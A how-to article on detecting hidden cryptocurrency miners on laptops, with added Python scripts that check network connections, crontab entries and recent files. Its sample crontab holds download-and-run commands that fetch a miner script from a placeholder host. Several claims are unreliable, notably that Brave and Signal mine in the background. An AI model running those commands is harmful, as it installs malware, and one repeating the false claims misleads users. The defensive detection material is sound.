Have you noticed that your laptop starts to slow down for no reason, and the cooler runs at maximum speed even during simple tasks? Your device may be infected with a hidden miner - malware that uses processor or video card resources to mine cryptocurrency. According to Kaspersky, in 2023 the number of attacks using mining software increased by 43% compared to the previous year. At the same time, 68% of users are not even aware of the infection, attributing the symptoms to the “age” of the equipment.
In this article you will find 7 proven methods for detecting a miner on a laptop with Windows 10/11, macOS or Linux - from analyzing CPU load to searching for suspicious processes in startup. We will look at both the built-in tools (Task Manager, Resource Monitor) and specialized utilities like Process Explorer or Malwarebytes. You will also find out which legal programs (for example, browsers or instant messengers) can mine cryptocurrency in the background without your knowledge.
1. Signs of a miner infection: when to sound the alarm
Hidden miners rarely give themselves away with obvious symptoms - their task is to remain undetected for as long as possible. However, there are 5 key signs that should alert you:
- 🔥 Constant overheating even under minimal load (CPU temperature is higher than 70°C when idle).
- ⚡ Dramatic reduction in battery life (30-50% compared to normal mode).
- 🐢 System slowdown when opening new tabs in the browser or launching programs.
- 🔊 Constant operation of the cooler at high speeds, even when the laptop is “doing nothing.”
- 📈 Unexplained traffic (if >1 GB of data per day is transferred without your knowledge).
You should be especially wary if symptoms appear after visiting dubious sites, installing pirated software or connecting to public Wi-Fi networks. Mining viruses are often spread through:
- 📂 Hacked programs (cracks, game repacks, Adobe Photoshop, AutoCAD).
- 🌐 Fake updates (for example, fake Flash Player or Java).
- 📧 Phishing emails with malicious attachments (`.js` and `.vbs` files are especially dangerous).
⚠️ Attention: Some legal programs (for example, the Brave browser or the Signal messenger) can use device resources for mining in the background. This is spelled out in their user agreements, but is often hidden in the fine print.
2. Check through Task Manager (Windows) or Activity Monitor (macOS)
The fastest way to identify a miner is to analyze the CPU and video card load in real time. On Windows this is done through Task Manager, on macOS - through Activity Monitor.
Instructions for Windows 10/11:
- Press Ctrl + Shift + Esc or Ctrl + Alt + Del → Task Manager.
- Go to the Processes tab and sort the list by the CPU column (descending).
- Pay attention to processes that are using 50%+ of the CPU for no apparent reason. Particularly suspicious:
  - 🔍 Unknown names (for example, `svchost.exe` with high load if you don't have active updates).
  - 🔍 Processes with random letters/numbers (`a1b2c3.exe`).
  - 🔍 Duplicate tasks (for example, two `chrome.exe` with the same PID).
- Startup tab - miners are often registered there to start when the PC is turned on.

For macOS (Monterey/Ventura):
- Open Applications → Utilities → Activity Monitor.
- Go to the CPU tab and sort by % CPU.
- Look for processes with names like `kernel_task` (if it loads >200% CPU), `WindowServer` or unknown `.app` files.
| Process | Normal load | Suspicious load | What to do |
|---|---|---|---|
| `svchost.exe` | 0-10% | 30%+ without updates | Check via Process Explorer |
| `chrome.exe` | 5-20% when working | 50%+ in background | Close all tabs, check extensions |
| `lsass.exe` | 0-5% | 15%+ permanently | Scan for viruses |
| `kernel_task` (macOS) | up to 100% at high load | 200%+ when idle | Check for overheating and miner |
3. Analysis of network activity: how a miner reveals itself
Mining viruses constantly exchange data with pool servers (for example, NiceHash, MinerGate), so they can be identified by atypical network traffic. To do this:
On Windows:
- Open Task Manager → Network Activity.
- Pay attention to processes that transfer data even when you are not using the Internet.
- Use this command in the Command Prompt (run as administrator): `netstat -ano | findstr "ESTABLISHED"`. It will show all active connections. Look for IP addresses from blacklists of mining pools (for example, 144.217.67.151 for NiceHash).
On macOS/Linux:
- Open Terminal and enter: `lsof -i -P | grep -i "established"`
- Or use `nettop -m tcp` for real-time traffic monitoring.
Suspicious signs:
- 🌍 Connections to IP addresses in Netherlands, Germany or USA (popular locations for mining servers).
- 🔄 Constant exchange of small packets (50-200 KB/s) even during idle time.
- 🚫 Connections on ports 3333, 5555, 7777 (often used by miners).
Example command to block a suspicious IP
If you find a suspicious IP (for example, 144.217.67.151), you can temporarily block it through the firewall:
netsh advfirewall firewall add rule name="Block Miner" dir=out action=block remoteip=144.217.67.151 enable=yes
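The connection check from this section can be automated. The following Python script is an added example, not part of the original article: it parses `netstat -ano` output and flags established sessions that match the ports and the pool IP named above. The sample output and the function names are constructed for illustration.

```python
import ipaddress

# Indicators taken from this article: the ports it calls typical for miners
# and the one pool IP it quotes. Extend both from your own blocklists.
MINER_PORTS = {3333, 5555, 7777}
POOL_IPS = {ipaddress.ip_address("144.217.67.151")}

# Constructed sample of `netstat -ano` output (not captured from a real host).
SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    192.168.1.20:49712     203.0.113.10:443       ESTABLISHED     4120
  TCP    192.168.1.20:49733     198.51.100.7:3333      ESTABLISHED     7788
  TCP    192.168.1.20:49750     144.217.67.151:443     ESTABLISHED     7788
  TCP    192.168.1.20:49761     198.51.100.9:7777      TIME_WAIT       0
  TCP    [::1]:49800            [::1]:5555             ESTABLISHED     912
  UDP    0.0.0.0:5353           *:*                                    1500
"""

def split_endpoint(endpoint):
    """Split 'ip:port' or '[ipv6]:port' into (ip_address, port)."""
    host, _, port = endpoint.rpartition(":")
    return ipaddress.ip_address(host.strip("[]")), int(port)

def suspicious_connections(netstat_text):
    """Return (pid, remote_ip, remote_port, reason) for flagged TCP sessions."""
    findings = []
    for line in netstat_text.splitlines():
        fields = line.split()
        # TCP rows have exactly 5 columns: proto, local, remote, state, pid.
        if len(fields) != 5 or fields[0] != "TCP" or fields[3] != "ESTABLISHED":
            continue
        ip, port = split_endpoint(fields[2])
        if ip.is_loopback:
            continue  # local inter-process traffic, not a pool connection
        reasons = []
        if port in MINER_PORTS:
            reasons.append("port")
        if ip in POOL_IPS:
            reasons.append("ip")
        if reasons:
            findings.append((int(fields[4]), str(ip), port, "+".join(reasons)))
    return findings

if __name__ == "__main__":
    for pid, ip, port, reason in suspicious_connections(SAMPLE):
        print(f"PID {pid}: {ip}:{port} matched {reason}")
```

The PID in each finding can be looked up in Task Manager (Details tab) to identify the owning process.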
4. Check startup and task scheduler
Miners are often registered in startup or create tasks in Task Scheduler (Windows) to start when the laptop is turned on. How to find them:
Startup (Windows/macOS):
- 🪟 Windows: Start → Settings → Apps → Startup.
- 🍎 macOS: System Preferences → Users & Groups → Login Items.
Look for programs with unfamiliar names or those that load the system upon startup.
Task Scheduler (Windows):
- Press Win + R, enter `taskschd.msc`.
- Check the folder Task Scheduler Library → Microsoft → Windows (look for non-standard tasks).
.bat, .vbs or .ps1 files).

Cron (Linux/macOS):
- Open Terminal and enter: `crontab -l`
- Look for lines with suspicious commands (for example, `wget http://.../miner.sh`).
⚠️ Attention: Some miners disguise themselves as legitimate processes, e.g. Windows Update or Google Software Updater. If you find a task with the name Update*random_symbols*, this is a sure sign of infection.
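As an added example (not from the original article), this Python script applies the cron check above to `crontab -l` output and flags jobs that download a file and then run it. The sample crontab, its `example.invalid` hosts and the function names are constructed for illustration.

```python
import re

# Constructed sample of `crontab -l` output; hosts and paths are placeholders.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=""
0 3 * * * /usr/local/bin/backup.sh
*/10 * * * * wget -q -O /tmp/.x http://pool.example.invalid/miner.sh && sh /tmp/.x
@reboot curl -fsSL http://pool.example.invalid/i.sh | bash
15 4 * * 1 curl -s https://status.example.invalid/ping > /dev/null
"""

# wget/curl followed by a URL inside the same simple command.
FETCH = re.compile(r"\b(wget|curl)\b[^|;&]*\bhttps?://\S+", re.I)
# Output piped straight into a shell interpreter.
PIPE_TO_SHELL = re.compile(r"\|\s*(sudo\s+)?(ba|z|da)?sh\b")
# A follow-up command that runs a file or marks it executable.
RUN_SCRIPT = re.compile(r"(&&|;)\s*((ba|z|da)?sh\s+|chmod\s+\+x\s+)\S+")

def cron_command(line):
    """Return the command part of a crontab entry, or None for non-job lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):                 # @reboot, @hourly, ...
        parts = line.split(None, 1)
        return parts[1] if len(parts) == 2 else None
    fields = line.split(None, 5)             # five schedule fields + command
    return fields[5] if len(fields) == 6 else None  # skips MAILTO= etc.

def suspicious_jobs(crontab_text):
    """Return (line_number, reason) for jobs that fetch and then execute."""
    hits = []
    for number, line in enumerate(crontab_text.splitlines(), start=1):
        command = cron_command(line)
        if command is None or not FETCH.search(command):
            continue
        if PIPE_TO_SHELL.search(command):
            hits.append((number, "download piped to shell"))
        elif RUN_SCRIPT.search(command):
            hits.append((number, "download then execute"))
    return hits

if __name__ == "__main__":
    for number, reason in suspicious_jobs(SAMPLE_CRONTAB):
        print(f"crontab line {number}: {reason}")
```

A job that only downloads (the last sample line) is not flagged, which keeps ordinary health-check pings out of the results.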
5. Using specialized utilities to search for miners
If the built-in tools do not help, use specialized programs, which scan the system for the presence of mining software:
| Program | Platform | What it looks for | Link |
|---|---|---|---|
| Process Explorer | Windows | Hidden processes, suspicious DLLs | Official website |
| Malwarebytes | Windows, macOS | Miners, Trojans, Spyware | malwarebytes.com |
| Kaspersky Virus Removal Tool | Windows | Hidden miners in startup and services | kaspersky.ru |
| Bitdefender Adware Removal Tool | Windows | Miners in browsers and extensions | bitdefender.ru |
How to use Process Explorer:
- Download the utility from the official Microsoft website (it's free).
- Run as administrator.
- Press Ctrl + D - this will highlight all processes signed by Microsoft. The rest should be checked manually.
- Right-click on the suspicious process → Properties → Threads. Miners often use high priority threads.
Malwarebytes Scan:
- Install the program and update the database.
- Run a Full scan (not a quick one!).
- Pay attention to the results in the categories PUP (Potentially Unwanted Program) and Trojan.Miner.
If the antivirus does not find the miner, but you are sure of infection, try running a scan in Safe Mode (press F8 when Windows boots or use `msconfig`). Many miners do not activate in this mode, allowing them to be detected.
6. Checking the browser for a hidden miner
One of the most common mining methods is through browser extensions or tabs with malicious JavaScript code. For example, in 2022, hackers hacked more than 4,000 websites and injected the Coinhive script into them, which mined Monero on visitors' computers.
How to check your browser:
- Google Chrome / Yandex Browser / Edge:
  - Go to Settings → Extensions.
  - Remove any suspicious plugins (especially those that promise to “speed up page loading” or “block ads”).
  - Use the built-in Browser Task Manager (Shift + Esc) to find high CPU usage tabs.
- Mozilla Firefox:
  - Enter `about:addons` in the address bar and check the plugins.
  - Use `about:performance` to see which tabs are loading the system.

Task Manager and see if the browser itself (`chrome.exe`, `firefox.exe`) is loading the CPU at 30%+ without active actions.

List of miner extensions that should be removed immediately:
- 🚨 SafeBrowse, AdBlock Pro (fake versions).
- 🚨 HD for YouTube, Video Downloader.
- 🚨 SearchManager, Super Optimization.
If the CPU load does not drop after closing the browser, the miner is most likely embedded in the system and not working through a tab. In this case, you need to scan the entire laptop with an antivirus.
7. Checking the file system for suspicious files
Miners often hide their files in system folders or disguise them as legitimate processes. Where to look:
Typical locations:
- 📁 `C:\Windows\System32\` (look for files with random names like `consent.exe` or `taskhostw.exe`, if they are not system).
- 📁 `C:\Users\<Your_name>\AppData\Roaming\` (popular place for miners).
- 📁 `/Library/Application Support/` (on macOS).
- 📁 Folders with games or pirated software (for example, `C:\Games\GTA V\crack\miner.exe`).
How to find:
- On Windows, open Explorer and enable display of hidden files (View → Hidden items).
- Use a search by modification date: miners are updated frequently, so look for files modified in the last 1-2 days.
- On macOS/Linux use the command: `find / -type f -mtime -2 \( -name "*.sh" -o -name "*.exe" -o -name "*.pl" \)`. It will find all scripts and executable files modified in the last 2 days. The parentheses are required: without them, the `-type f -mtime -2` tests apply only to the `*.sh` pattern.
Suspicious files:
- 📄 Files without an extension or with a double one (`file.txt.exe`).
- 📄 Scripts (`.bat`, `.ps1`, `.vbs`) in non-standard folders.
- 📄 Executable files with names like `update.exe`, `service.exe`, `driver.exe`.
⚠️ Attention: Do not delete files from `System32` or `/usr/bin/` without verification! Many miners disguise themselves as system components (for example, `lsass.exe` can be either a legitimate process or a miner). First check the file via VirusTotal.
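The file criteria from this section, combined into one added Python example that is not part of the original article: it walks a folder and reports recently modified files with a double extension, a generic executable name or a script extension. The decoy-extension list and the function names are assumptions chosen for illustration.

```python
import os
import sys
import time
from pathlib import Path

# Extensions and names listed in this article.
SCRIPT_EXTS = {".bat", ".ps1", ".vbs", ".sh", ".pl"}
EXEC_EXTS = {".exe"} | SCRIPT_EXTS
GENERIC_NAMES = {"update.exe", "service.exe", "driver.exe"}
# Assumption: document-like extensions commonly used as the visible "decoy".
DECOY_EXTS = {".txt", ".pdf", ".doc", ".docx", ".jpg", ".png"}

def reasons_for(path):
    """Return the list of article criteria that a file name matches."""
    suffixes = [s.lower() for s in Path(path).suffixes]
    reasons = []
    if (len(suffixes) >= 2 and suffixes[-1] in EXEC_EXTS
            and suffixes[-2] in DECOY_EXTS):
        reasons.append("double extension")
    if Path(path).name.lower() in GENERIC_NAMES:
        reasons.append("generic executable name")
    if suffixes and suffixes[-1] in SCRIPT_EXTS:
        reasons.append("script")
    return reasons

def recent_suspects(root, days=2, now=None):
    """Return {relative_path: [reasons]} for files modified within `days`."""
    now = time.time() if now is None else now
    cutoff = now - days * 86400
    found = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            try:
                if path.stat().st_mtime < cutoff:
                    continue            # not modified recently
            except OSError:
                continue                # unreadable or removed mid-scan
            reasons = reasons_for(path)
            if reasons:
                found[path.relative_to(root).as_posix()] = reasons
    return found

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for rel, why in sorted(recent_suspects(target).items()):
        print(f"{rel}: {', '.join(why)}")
```

A match is only a reason to inspect the file (for example via VirusTotal), not proof of infection.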
FAQ: Frequently asked questions about miners on laptops
Can a miner damage a laptop?
Yes, long-term operation at high temperatures (above 85°C) leads to thermal paste degradation, cooler wear and reduced battery life. In extreme cases, overheating of chips is possible (especially on laptops with weak cooling systems, for example, MacBook Air or Ultrabook).
How does the miner get to the laptop if I haven’t downloaded anything?
There are several ways:
- 🌐 Via browser vulnerabilities (for example, an outdated version of Chrome or Firefox).
- 📧 Via attachments in emails (even if you did not open the file, some viruses are activated during preview).
- 🔌 Via infected USB drives (autorun scripts).
- 📡 Via public Wi-Fi networks (for example, in cafes or airports).
Is it possible to mine on a laptop legally?
Technically yes, but this is strongly discouraged:
- 🔋 Laptops are not designed for 24/7 use - this leads to rapid wear.
- 💰 Profitability of mining on a CPU/integrated video card (Intel UHD, AMD Radeon Vega) is minimal - you will spend more on electricity than you earn.
- ⚡ Risk of overheating and video card failure (especially on laptops with NVIDIA GTX/RTX or AMD RX).
What to do if the antivirus does not find the miner, but the laptop slows down?
Try the following steps:
- Run a live antivirus (for example, Kaspersky Rescue Disk or Dr.Web LiveUSB) - it scans the system before Windows boots.
- Check network connections through Wireshark or TCPView.
- Roll back the system to a restore point (if the miner appeared recently).
- Reinstall Windows/macOS (as a last resort).
Can the miner run on Linux?
Yes, although less often. Miners for Linux are usually distributed through:
- 🐧 Fake packages in repositories (for example, `sudo apt-get install fake-package`).
- 🐧 Server vulnerabilities (if you are using a laptop as a server).
- 🐧 Scripts for automatic software installation (for example, `curl | bash`).
Check the system via top, htop or nethogs.